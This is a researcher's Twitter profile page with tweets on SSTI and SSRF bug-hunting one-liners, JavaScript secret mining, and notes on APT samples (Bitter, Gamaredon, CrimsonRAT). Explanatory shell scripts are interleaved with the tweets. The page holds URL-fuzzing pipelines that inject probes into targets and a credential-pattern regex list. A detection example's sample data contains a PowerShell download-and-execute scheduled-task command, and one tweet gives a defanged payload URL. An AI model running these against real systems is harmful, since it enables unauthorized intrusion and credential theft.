zhixiang hao (@haozhixiang)'s Twitter Profile
zhixiang hao

@haozhixiang

APT threat, Web security, OSINT
Shandong Lanxiang School, China. My sample analysis is just for learning and research.

ID: 1463316372541169671

Joined: 24-11-2021 01:20:08

505 Tweets

1.1K Followers

343 Following

zhixiang hao (@haozhixiang):

Web vulnerability mining: SSTI vulnerability
# collect archived URLs, drop static assets, swap every query value for an SSTI probe (no sudo needed for this)
waybackurls target.com | grep -Ev "\.(jpeg|jpg|png|ico|js|css|svg|ttf|eot|woff|webp)$" | qsreplace "ssti{{9*9}}" > fuzz.txt
# "print" is not a shell command; echo the URL after each SSTImap run
while IFS= read -r url; do python3 sstimap.py -u "$url"; echo "$url"; done < fuzz.txt
zhixiang hao (@haozhixiang):

One command for SSRF mining
# "burpcollaborator" is a placeholder: put your own Collaborator / interactsh hostname there before running
gau --subs xxx.com | gf ssrf | sort -u | httpx -mc 200 | qsreplace "burpcollaborator" >> ssrfuzzxxx.txt; ffuf -c -w ssrfuzzxxx.txt -u FUZZ
happy hunting everyone 😄
Mentioned: 🇸🇦 Murtada Bin Abdullah (Rood) (@0x_rood), Justin Gardner (@Rhynorater), zseano (@zseano), H1 Disclosed - Public Disclosures (@h1Disclosed), H4x0r.DZ (@h4x0r_dz), N$ (@nav1n0x)
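The SSTI and SSRF one-liners above have the same shape: harvest archived URLs, keep the interesting ones, then rewrite every query value into a probe. The script below is an added example, not the author's tooling and not the real `waybackurls`, `gf` or `qsreplace` code: it reimplements the filter, the parameter match and the value substitution in plain POSIX shell and dry-runs both pipelines on a constructed URL list, so the flow can be followed offline. Assumptions: the static-extension list is the one in the SSTI tweet; `SSRF_PARAMS` is a hand-picked approximation of the parameter names `gf ssrf` looks for, not its pattern file; `xxxxxxxx.burpcollaborator.net` is a placeholder; the `httpx` liveness check and the actual `sstimap` / `ffuf` runs are left out.

```shell
#!/bin/sh
# Added example (not the author's own tooling): pure-shell stand-ins for the
# filter / gf / qsreplace stages of the two one-liners above, run on a
# constructed URL list so the flow can be dry-run offline.
# Assumptions: the static-extension list is the one from the SSTI one-liner;
# SSRF_PARAMS is a hand-picked approximation of what `gf ssrf` matches, not
# the real pattern file; the Collaborator hostname is a placeholder.

# Drop URLs ending in a static-asset extension (case-insensitive here,
# unlike the original grep, so logo.PNG is dropped as well).
filter_static() {
  grep -Eiv '\.(jpeg|jpg|png|ico|js|css|svg|ttf|eot|woff|webp)$'
}

# Keep URLs whose query carries a parameter name that usually holds a
# URL or host (constructed list, assumption).
SSRF_PARAMS='url|uri|redirect|redirect_uri|next|dest|destination|callback|proxy|host|domain|target|site|feed|image|img|load|src|fetch'
grep_ssrf_params() {
  grep -Ei "[?&]($SSRF_PARAMS)="
}

# Replace the value of every query parameter in one URL with $2, keeping
# scheme, host, path and parameter names (the job qsreplace does).
inject_payload() {
  local url payload base query out pair name oldifs
  url=$1; payload=$2
  case "$url" in
    *\?*) ;;
    *) printf '%s\n' "$url"; return ;;   # no query string: nothing to inject
  esac
  base=${url%%\?*}; query=${url#*\?}; out=''
  set -f                                 # no globbing while we split on '&'
  oldifs=$IFS; IFS='&'
  for pair in $query; do
    name=${pair%%=*}
    out="${out:+$out&}$name=$payload"
  done
  IFS=$oldifs; set +f
  printf '%s?%s\n' "$base" "$out"
}

# Constructed sample of waybackurls / gau output (assumption).
SAMPLE_URLS='https://target.com/static/app.js
https://target.com/img/logo.PNG
https://target.com/search?q=test&page=2
https://target.com/proxy?url=http://example.com/feed
https://target.com/profile?name=bob
https://target.com/redirect?next=/home&token=abc'

# SSTI one-liner: drop static assets, inject the arithmetic probe everywhere.
ssti_candidates() {
  printf '%s\n' "$SAMPLE_URLS" | filter_static | while IFS= read -r u; do
    inject_payload "$u" 'ssti{{9*9}}'
  done
}

# SSRF one-liner: gf-style parameter match, then point every value at the
# callback host (the httpx liveness check is skipped offline).
ssrf_candidates() {
  printf '%s\n' "$SAMPLE_URLS" | sort -u | grep_ssrf_params | while IFS= read -r u; do
    inject_payload "$u" 'http://xxxxxxxx.burpcollaborator.net/'
  done
}

ssti_candidates
ssrf_candidates
```

On the sample list the SSTI stage yields four probe URLs (the `.js` and `.PNG` entries are dropped) and the SSRF stage yields two (`proxy?url=` and `redirect?next=`), every parameter value rewritten while names and paths stay intact, which is exactly what you want to eyeball before pointing `sstimap` or `ffuf` at a real target.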
zhixiang hao (@haozhixiang):

These two commands help you complete sensitive-information mining and are suitable for large-scale batch work.
# "(?:on|)" is PCRE syntax and is rejected by grep -E; "\.js(on)?$" keeps .js and .json URLs
gau --subs x.com | cut -d"?" -f1 | grep -E "\.js(on)?$" | tee urls.txt
# every matched request is replayed through Burp, so the JS bodies land in the proxy history
ffuf -w urls.txt:HFUZZ -u HFUZZ -replay-proxy http://burpip:port
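What the two commands give you is a list of script files sitting in Burp's history; the mining itself is then a grep over their bodies. The script below is an added example, not the author's tooling: `select_js_urls` reproduces the URL selection of the `gau | cut | grep` stage with a regex that `grep -E` actually accepts, and `scan_secrets` shows the follow-up step of pulling credential-shaped strings out of a bundle. Both the URL list and the JS fragment are constructed samples (the AWS id is Amazon's documented example key), and `SECRET_PATTERNS` is a small hand-picked set, not a complete secret-scanner ruleset.

```shell
#!/bin/sh
# Added example (not the author's own tooling). select_js_urls reproduces the
# URL selection of the gau | cut | grep stage with a regex GNU grep -E accepts
# ("(?:on|)" is PCRE and fails under -E). scan_secrets is the step that comes
# after ffuf has replayed the files through Burp: grep the bodies for
# credential-shaped strings. Both samples are constructed (assumption), and
# secret_regex is a small hand-picked set, not a full scanner ruleset.

# Keep unique .js / .json URLs with the query string stripped.
select_js_urls() {
  sed 's/?.*//' | grep -Ei '\.js(on)?$' | sort -u
}

# One ERE per line: AWS access key id, Google API key, Slack token,
# PEM private-key header, and a generic key/secret/token/password assignment.
# Joined with '|' into a single alternation for grep -E.
secret_regex() {
  cat <<'EOF' | tr '\n' '|' | sed 's/|$//'
AKIA[0-9A-Z]{16}
AIza[0-9A-Za-z_-]{35}
xox[abpr]-[0-9A-Za-z-]{10,}
-----BEGIN [A-Z ]*PRIVATE KEY-----
(api[_-]?[kK]ey|secret|token|password)["']?[[:space:]]*[:=][[:space:]]*["'][^"']{8,}["']
EOF
}

# Read a JS/JSON body on stdin, print each matching fragment on its own line.
scan_secrets() {
  grep -Eo "$(secret_regex)"
}

# Constructed gau-style output (assumption): duplicates differing only in the
# query string, a .jsx that must not match, and an upper-case extension.
SAMPLE_URLS='https://x.com/static/main.js?v=3
https://x.com/static/main.js?v=4
https://api.x.com/config.json
https://x.com/index.html
https://x.com/vendor/app.jsx
https://cdn.x.com/bundle.JS'

# Constructed bundle fragment (assumption); AKIAIOSFODNN7EXAMPLE is the
# access key id AWS uses in its own documentation, not a live credential.
SAMPLE_JS='const cfg = { apiKey: "sk_live_0123456789abcdef", region: "us-east-1" };
var awsId = "AKIAIOSFODNN7EXAMPLE";
fetch("/api/v1/items", { headers: { Authorization: "Bearer " + getToken() } });'

js_urls()       { printf '%s\n' "$SAMPLE_URLS" | select_js_urls; }
found_secrets() { printf '%s\n' "$SAMPLE_JS" | scan_secrets; }

js_urls
found_secrets
```

The URL stage collapses the six sample lines to three unique script URLs, and the scan reports two hits (the `apiKey` assignment and the AWS key id) while ignoring the `Bearer` header that is built at runtime; in practice you would run `scan_secrets` over the bodies saved from Burp rather than over an inline string.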
zhixiang hao (@haozhixiang):

Bitter APT attack sample. The bait is a CHM file whose content urges everyone to report crimes online.
chm -> cmd -> powershell -> schtasks -> download jpg -> exec command
Guess: it collects target information in the early stage, then precisely switches the pic.jpg command-and-control payload.
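The chain in the tweet has three points a defender can key on: the CHM viewer spawning a shell, a scheduled task whose action runs PowerShell, and a PowerShell download cue fetching an "image". The script below is an added example, not from the tweet and not from any vendor's ruleset: it runs those three cues as a small detection pass over constructed process-creation records. The record format is a constructed `parent|image|command_line` triple rather than Sysmon's schema, the command lines are invented for illustration, and `198.51.100.7` is an RFC 5737 documentation address, not an indicator from the sample.

```shell
#!/bin/sh
# Added example, not from the tweet or from any vendor ruleset: a detection
# pass over constructed process-creation records for the chain described
# above (chm -> cmd -> powershell -> schtasks -> download jpg -> exec).
# Record format is a constructed "parent|image|command_line" triple, not
# Sysmon's; 198.51.100.7 is an RFC 5737 documentation address, not an IOC.
# Command lines must not themselves contain the '|' separator.

# Three independent cues, each enough for an alert on its own:
#  1. hh.exe (the CHM viewer) spawning cmd.exe or powershell.exe
#  2. schtasks /create whose task action runs powershell
#  3. a PowerShell download cue fetching a .jpg/.jpeg (image-disguised payload)
score_chain() {
  awk -F'|' '
  {
    p = tolower($1); i = tolower($2); c = tolower($3); hits = ""
    if (p == "hh.exe" && (i == "cmd.exe" || i == "powershell.exe"))
      hits = hits "chm-spawns-shell "
    if (i == "schtasks.exe" && c ~ /\/create/ && c ~ /powershell/)
      hits = hits "schtasks-persists-powershell "
    if (c ~ /(downloadstring|downloadfile|invoke-webrequest|net\.webclient|iwr )/ && c ~ /https?:\/\/[^ ]*\.(jpg|jpeg)/)
      hits = hits "download-image-disguised-payload "
    if (hits != "") print "ALERT [" hits "] " $0
  }'
}

# Constructed records (assumption): two malicious steps in the chain plus
# benign noise, including a PowerShell download of a PDF that must NOT fire.
SAMPLE_EVENTS='hh.exe|cmd.exe|cmd.exe /c start /min powershell -w hidden -nop -ep bypass
cmd.exe|powershell.exe|powershell -w hidden -nop -ep bypass
powershell.exe|schtasks.exe|schtasks /create /sc minute /mo 10 /tn SysUpdate /tr "powershell -w hidden -c IEX((New-Object Net.WebClient).DownloadString(\"http://198.51.100.7/pic.jpg\"))"
explorer.exe|chrome.exe|chrome.exe --type=renderer
services.exe|svchost.exe|svchost.exe -k netsvcs -p
explorer.exe|powershell.exe|powershell -c Invoke-WebRequest https://example.com/report.pdf -OutFile report.pdf'

detect_chain() { printf '%s\n' "$SAMPLE_EVENTS" | score_chain; }

detect_chain
```

Run against the sample, two of the six records alert: the `hh.exe -> cmd.exe` spawn, and the `schtasks /create` record, which trips both the persistence cue and the image-download cue at once; the plain `cmd.exe -> powershell.exe` hop and the PDF download stay quiet, which is the point of keying on the chain's distinctive links rather than on PowerShell alone.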
zhixiang hao (@haozhixiang):

APT Gamaredon
The content of the document is a forged "Electronic Trust Service of the Shastinska Regional Electricity Administration of Ukraine" document.
наказ_в_дпов_дальної особи.doc (Ukrainian; roughly "order of the responsible person.doc")
http[:]//principles67.vilitord.ru/BUDGET/stoppage56/rejoice/already[.]mkv
can't access
zhixiang hao (@haozhixiang):

Web security and bug hunting: sharing an online monitoring method for subdomain takeover. It can also detect malicious IOC indicators.
takeover.cyberint.com
Threat Intelligence (@threatintel):

Our Threat Hunter Team has discovered a few more IOCs relating to publicly reported attacks against airport and security targets in Armenia. (Documented here: x.com/HaoZhixiang/st… and here cyberhub.am/en/blog/2023/0…) (1 of 5)

zhixiang hao (@haozhixiang):

It is estimated to be an attack targeting India. The content of the malicious DOCM document is mathematics, science and technology material from the University of Madrid in India. The VBA code is executed when the document is opened, and the bin file is embedded in the document.
CrimsonRAT